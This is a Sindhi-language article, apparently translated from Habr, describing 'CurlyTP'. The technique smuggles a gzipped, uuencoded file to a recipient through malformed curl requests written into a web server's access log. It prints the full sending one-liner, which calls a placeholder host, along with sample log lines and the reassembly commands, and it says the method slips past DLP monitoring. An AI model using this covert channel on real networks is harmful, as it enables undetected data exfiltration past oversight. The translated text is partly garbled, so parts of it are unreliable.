وڪيپيڊيا جي وصف مطابق، هڪ مئل ڊراپ هڪ سازشي اوزار آهي جيڪو ڳجهي هنڌ استعمال ڪندي ماڻهن جي وچ ۾ معلومات يا ڪجهه شيون مٽائڻ لاءِ ڪم ڪندو آهي. خيال اهو آهي ته ماڻهو ڪڏهن به نه ملندا آهن - پر اهي اڃا تائين معلومات مٽائي رهيا آهن آپريشنل حفاظت کي برقرار رکڻ لاءِ.
لڪائڻ واري جڳهه کي ڌيان نه ڏيڻ گهرجي. تنهن ڪري، آف لائن دنيا ۾ اهي اڪثر استعمال ڪن ٿا سمجھدار شيون: ڀت ۾ هڪ ٿلهي سر، هڪ لائبريري ڪتاب، يا هڪ وڻ ۾ سوراخ.
انٽرنيٽ تي ڪيترائي انڪرپشن ۽ گمنامي جا اوزار آهن، پر انهن اوزارن کي استعمال ڪرڻ جي حقيقت ئي ڌيان ڇڪائي ٿي. ان کان سواء، اهي ڪارپوريٽ يا سرڪاري سطح تي بلاڪ ٿي سگهن ٿيون. ڇا ڪجي؟
ڊولپر ريان فلاورز هڪ دلچسپ آپشن پيش ڪيو - . جيڪڏهن توهان ان جي باري ۾ سوچيو، ويب سرور ڇا ڪندو آهي؟ درخواستون وصول ڪري ٿو، فائلون مسئلا ۽ لاگ لکي ٿو. ۽ اهو سڀني درخواستن کي لاگ ان ڪري ٿو، جيتوڻيڪ غلط!
اهو ظاهر ٿئي ٿو ته ڪنهن به ويب سرور توهان کي لاگ ان ۾ تقريبا ڪنهن به پيغام کي محفوظ ڪرڻ جي اجازت ڏئي ٿو. گل حيران ٿي ويا ته هي ڪيئن استعمال ڪجي.
هي اختيار پيش ڪري ٿو:
- هڪ ٽيڪسٽ فائل وٺو (ڳجهو پيغام) ۽ حساب ڪريو هيش (md5sum).
- اسان ان کي ڪوڊ ڪيو (gzip + uuencode).
- اسان سرور ڏانهن عمدي طور تي غلط درخواست استعمال ڪندي لاگ ڏانهن لکون ٿا.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shفائل پڙهڻ لاءِ، توهان کي انهن عملن کي ريورس آرڊر ۾ انجام ڏيڻ جي ضرورت آهي: فائل کي ڊيڪوڊ ۽ ان زپ ڪريو، هيش چيڪ ڪريو (هيش محفوظ طور تي کليل چينلن تي منتقل ٿي سگهي ٿو).
اسپيس سان تبديل ڪيا ويا آهن =+=ته جيئن ايڊريس ۾ ڪو به خال نه هجي. پروگرام، جنهن کي ليکڪ سڏي ٿو CurlyTP، استعمال ڪري ٿو base64 انڪوڊنگ، جهڙوڪ اي ميل منسلڪات. درخواست ھڪڙي لفظ سان ڪئي وئي آھي ?transfer?ته جيئن وصول ڪندڙ ان کي آسانيءَ سان لاگن ۾ ڳولي سگهي.
اسان هن ڪيس ۾ لاگ ان ۾ ڇا ٿا ڏسو؟
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"جيئن اڳ ۾ ئي ذڪر ڪيو ويو آهي، هڪ ڳجهي پيغام حاصل ڪرڻ لاء توهان کي ريورس آرڊر ۾ آپريشن ڪرڻ جي ضرورت آهي:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gعمل خودڪار ڪرڻ آسان آهي. Md5sum ملن ٿا، ۽ فائل جو مواد تصديق ڪري ٿو ته هر شي صحيح طريقي سان ڊيڪوڊ ڪئي وئي هئي.
طريقو بلڪل سادو آهي. "هن مشق جو نقطو صرف اهو ثابت ڪرڻ آهي ته فائلن کي معصوم ننڍڙي ويب درخواستن ذريعي منتقل ڪري سگهجي ٿو، ۽ اهو ڪم ڪري ٿو ڪنهن به ويب سرور تي سادي ٽيڪسٽ لاگ سان. لازمي طور تي، هر ويب سرور هڪ لڪائڻ جي جڳهه آهي!" لکي ٿو فلاورز.
يقينا، طريقو صرف ڪم ڪري ٿو جيڪڏهن وصول ڪندڙ کي سرور لاگ تائين رسائي آهي. پر اهڙي رسائي مهيا ڪئي وئي آهي، مثال طور، ڪيترن ئي ميزبان طرفان.
ان کي ڪيئن استعمال ڪجي؟
ريان فلاورز جو چوڻ آهي ته هو انفارميشن سيڪيورٽي ماهر نه آهي ۽ CurlyTP لاءِ ممڪن استعمال جي فهرست مرتب نه ڪندو. هن لاء، اهو صرف تصور جو ثبوت آهي ته واقف اوزار جيڪي اسان هر روز ڏسندا آهيون هڪ غير روايتي طريقي سان استعمال ڪري سگهجي ٿو.
حقيقت ۾، هن طريقي سان ٻين سرور جي ڀيٽ ۾ ڪيترائي فائدا آهن "لڪايو" وانگر يا : ان کي سرور جي پاسي يا ڪنهن خاص پروٽوڪول تي خاص ترتيب ڏيڻ جي ضرورت ناهي - ۽ انهن جي وچ ۾ شڪ پيدا نه ڪندو جيڪي ٽرئفڪ جي نگراني ڪن ٿا. اهو ممڪن ناهي ته هڪ SORM يا DLP سسٽم ڪمپريس ٿيل ٽيڪسٽ فائلن لاءِ URLs اسڪين ڪندو.
هي سروس فائلن ذريعي پيغام پهچائڻ جو هڪ طريقو آهي. توهان ياد ڪري سگهو ٿا ته ڪيئن ڪجهه ترقي يافته ڪمپنيون استعمال ڪندا هئا يا HTML صفحن جي ڪوڊ ۾.
خيال اهو هو ته صرف ويب ڊولپرز هن ايسٽر ايگ کي ڏسندا، ڇاڪاڻ ته هڪ عام ماڻهو هيڊر يا HTML ڪوڊ کي نه ڏسندو.
جو ذريعو: www.habr.com